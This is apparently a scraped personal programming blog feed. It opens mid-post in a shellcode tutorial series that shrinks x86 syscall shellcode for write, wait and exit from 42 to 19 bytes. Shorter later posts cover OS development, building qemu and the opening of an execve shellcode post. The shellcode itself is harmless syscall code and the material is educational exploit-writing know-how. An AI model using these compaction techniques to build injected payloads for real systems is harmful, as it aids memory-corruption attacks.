<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #1byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call -0x37;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="font-family: inherit;"><span class="Apple-style-span">This code is the write system call that I wrote in the previous article.</span></div><div style="font-family: inherit;"><span class="Apple-style-span">The code size of this shellcode is 46 bytes long.</span></div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">rewrite the shellcode</span> </span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 0x20;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #1byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> mul </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x4(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #3byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x7(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #3byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x1(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #3byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80; #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call -0x37;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #7byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span></pre></div><div style="font-family: inherit; margin: 0px;"><span class="Apple-style-span">The code size is reduce to 34 bytes long.</span></div><div style="margin: 0px;"><div style="font-family: inherit;"><span class="Apple-style-span">P.S the mul instruction will save the result to %eax and %edx, therefore the %eax and %edx is now being set to zero. </span></div></div><div style="margin: 0px;"></div><div style="font-family: inherit; margin: 0px;"><span class="Apple-style-span">2. </span></div>The push trick and relative jmp/call trick both can get the address of the data, but sometimes using the push trick in the right condition can reduce some bytes of the shellcode.<br />
consider the following example in shell code 3: <br />
<span class="Apple-style-span" style="color: black; font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;"><span style="font-family: inherit;"></span></span></span><br />
<div style="margin: 0px;"><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* relative jmp/call trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pop </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .long 0x00000002,0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span> </pre><pre style="background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">The above code is 42 bytes.</pre><pre style="background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"> </pre></div><pre style="background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* push trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;"> </span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">} </span></pre><div style="margin: 0px;">The code size is 30 bytes.<br />
By using the push trick, we reduced 12 bytes of the shellcode. Nice!!!<br />
<br />
3.<br />
The 0x66 prefix or 16bit/8bit mov instruction.<br />
If the constant value is smaller than 0xffff using the 0x66 prefix or movw instruction in gnu assember. In this way, it can reduce one more byte of the shellcode.<br />
If the constant value is smaller than 0xff using the movb instruction since it only cost two bytes.<br />
Rewrite the previous example:<br />
<div style="margin: 0px;"><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* push trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> mov $162, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x1(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;"> </span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="font-family: inherit;">The size of the above code is reduce to 19 bytes.<br />
Reduce 11 bytes of the code.<br />
Now the wait system call and exit system call only cost 19 bytes instead of 42 bytes.<br />
<br />
</div><div style="font-family: inherit;">These tricks is very useful in some conditions, enjoy. :D </div></div></div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-52384248783684696572011-10-14T08:14:00.000-07:002011-12-17T07:50:26.927-08:00Dennis Ritchie R.I.P#include <stdio.h><br />
<br />
int main(void){<br />
printf("Rest in piece Dennis Ritchie, father of the C language, great programmer and a true hacker. You changed the whole world.\n");<br />
return 0;<br />
}Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com3tag:blogger.com,1999:blog-1191178933370250826.post-74023363225176222712011-10-08T11:32:00.000-07:002011-10-08T11:32:02.462-07:00SimpleOS source codeI finally upload my OS source code to the github. The following is the link:<br />
<a href="https://github.com/mike820324/SimpleOS">https://github.com/mike820324/SimpleOS</a><br />
<br />
Recently I'm very busy because the school work. When my school work is finished, I will post some article about the source code, from the booting process to the protected mode in detailed. :PAnonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-57515242170543801992011-08-13T09:16:00.000-07:002011-12-08T07:17:14.533-08:00Simple OS - noteWhile I was working on my simple operating system project. I found something interesting.<br />
Almost all the x86 system boot up in 16-bit real mode. And the way to enable the protected mode is quite easy.<br />
As <a href="http://wiki.osdev.org/Babystep7">osdev wiki</a> suggest, using the following instruction can take us from real mode to protected mode.<br />
<div style="font-family: "Courier New",Courier,monospace;">
....</div>
<pre style="font-family: "Courier New",Courier,monospace;"><span class="kw1">mov</span> <span class="kw3">eax</span><span class="sy0">,</span> <span class="kw3">cr0</span> <span class="co1">; switch to pmode by</span>
<span class="kw1">or</span> <span class="kw3">al</span><span class="sy0">,</span><span class="nu0">1</span> <span class="co1">; set pmode bit</span>
<span class="kw1">mov</span> <span class="kw3">cr0</span><span class="sy0">,</span> <span class="kw3">eax</span></pre>
<pre style="font-family: "Courier New",Courier,monospace;"><span class="kw3">.....</span></pre>
<pre style="font-family: "Courier New",Courier,monospace;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">But there are one thing that bother me a lot, since our code is still in the real mode, </span></pre>
<pre style="font-family: inherit;"><span class="kw3">how can we use the 32-bit register and instructions.</span></pre>
<pre style="font-family: inherit;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">After google for a while I found a very helpful website that completely solved my question.</span></pre>
<pre style="font-family: inherit;"><span class="kw3"><a href="http://stackoverflow.com/questions/6917503/assembly-question">answer in stackoverflow</a> </span></pre>
<pre style="font-family: inherit;"><span class="kw3"><a href="http://forum.nasm.us/index.php?topic=991.0">answer in nasm forum</a> </span></pre>
<pre style="font-family: inherit;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">The answer is that</span></pre>
<pre style="font-family: inherit;">When intel introduced 32-bit code - they used the same opcodes! </pre>
<div style="font-family: inherit;">
When using 32bit register in 16 bit real mode, assembler will place a prefix in front of the instruction. (0x66 according to the nasm forum) This tell the cpu that I'm using 32-bit register</div>
<div style="font-family: inherit;">
in 16-bits real mode.</div>
<div style="font-family: inherit;">
<br /></div>
<div style="font-family: inherit;">
I take some picture to verified the result.</div>
<pre style="font-family: inherit;"><span class="kw3">My environment is ubuntu 10.10 and gcc 4.4.5</span></pre>
<pre style="font-family: inherit;"><span class="kw3">I' using qemu and gdb to verified the result.</span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-r1XNQe1wU4M/TkanEZccEpI/AAAAAAAAAI4/qDVLD1h8NQ8/s1600/16_bit_real_mode1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="331" src="http://4.bp.blogspot.com/-r1XNQe1wU4M/TkanEZccEpI/AAAAAAAAAI4/qDVLD1h8NQ8/s640/16_bit_real_mode1.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-SBbjWu43j3w/TkanFcXpvcI/AAAAAAAAAI8/yTu9O3FyJmc/s1600/16_bit_real_mode_gdb_dump.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="291" src="http://3.bp.blogspot.com/-SBbjWu43j3w/TkanFcXpvcI/AAAAAAAAAI8/yTu9O3FyJmc/s640/16_bit_real_mode_gdb_dump.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-fOQ5TBV3OT0/TkanGG29pgI/AAAAAAAAAJA/WHPEwH2-xMA/s1600/16_bit_real_mode_gdbdump2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="80" src="http://4.bp.blogspot.com/-fOQ5TBV3OT0/TkanGG29pgI/AAAAAAAAAJA/WHPEwH2-xMA/s640/16_bit_real_mode_gdbdump2.jpg" width="640" /></a></div>
<pre style="font-family: inherit;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3"> </span><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">As you can see, there are 0x66 prefix in front of the mov eax, 0 instruction.
</span></pre>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-92140401062611818872011-08-09T01:11:00.000-07:002011-12-06T11:54:18.794-08:00compile qemu under ubuntuFor some reason, I have to build qemu from the source code.<br />
This is some note of how to do this.<br />
<br />
My environment:<br />
ubuntu 10.10<br />
gcc 4.4.5<br />
<br />
<br />
1.<br />
download the source code of the qemu from the following link.<br />
<a href="http://wiki.qemu.org/Download">http://wiki.qemu.org/Download</a><br />
I choose version 0.15<br />
<br />
2.<br />
install some require libraries and tools.<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo apt-get install build-essential checkinstall </span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo apt-get install zliblg-dev</span> <span style="font-family: "Courier New",Courier,monospace;">libSDL-dev </span><br />
<br />
3.<br />
extract the tar.gz.<br />
<span style="font-family: "Courier New",Courier,monospace;">tar -xvf qemu-0.15.0.tar.gz</span><br />
<br />
4.<br />
cd to the directory and configure.<br />
<div style="font-family: "Courier New",Courier,monospace;">
./configure</div>
<br />
5.<br />
build the source code.<br />
<div style="font-family: "Courier New",Courier,monospace;">
./make</div>
<br />
6.<br />
install the qemu. You can use <b>make install, </b>but I recommend using the checkinstall.<br />
It is easier to manage the code u build. <br />
(Since I can't find the uninstall tag in the Makefile of qemu. Therefore, I use checkinstall instead of make install.)<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo checkinstall -D --install=no</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo dpkg -i $package_name</span><br />
<b><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: inherit;">P.S</span> </span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: inherit;">a.</span></span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: inherit;">-D will create a debian package for the debian distribution.</span></span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;">If u want to build rpm , just use -R instead of -D </span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;">b.</span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;">dpkg is the utility to install a deb package. If u want to uninstall a package use -r.</span></b><br />
<span style="font-family: "Courier New",Courier,monospace;"><br />
</span><br />
<span style="font-family: "Courier New",Courier,monospace;">reference website:</span><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: inherit;"> </span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: inherit;"><a href="http://hpclab.cs.pu.edu.tw/wiki/index.php/QEMU%28Ubuntu%29">http://hpclab.cs.pu.edu.tw/wiki/index.php/QEMU%28Ubuntu%29</a><br />
<a href="http://sites.google.com/site/embedded2009/weekly-small-project-list/build-qemu">http://sites.google.com/site/embedded2009/weekly-small-project-list/build-qemu</a></span></span><br />
<b><span style="font-family: "Courier New",Courier,monospace;"><a href="http://www.linuxjournal.com/content/using-checkinstall-build-packages-source">http://www.linuxjournal.com/content/using-checkinstall-build-packages-source</a><br />
<a href="http://www.falkotimme.com/howtos/checkinstall/">http://www.falkotimme.com/howtos/checkinstall/</a> </span></b><br />
<br />Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-51963453251505715582011-07-04T02:04:00.000-07:002011-11-02T08:47:44.430-07:00Shell code 5(execve system call)This article is mainly reference by this website:<br />
<a href="http://insecure.org/stf/smashstack.html">smash the stack for fun and profit</a><br />
This time I'll use execve system call to remove a file called "test".<br />
Before started, let's see how execve works in c.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">the man page of execve</span><br />
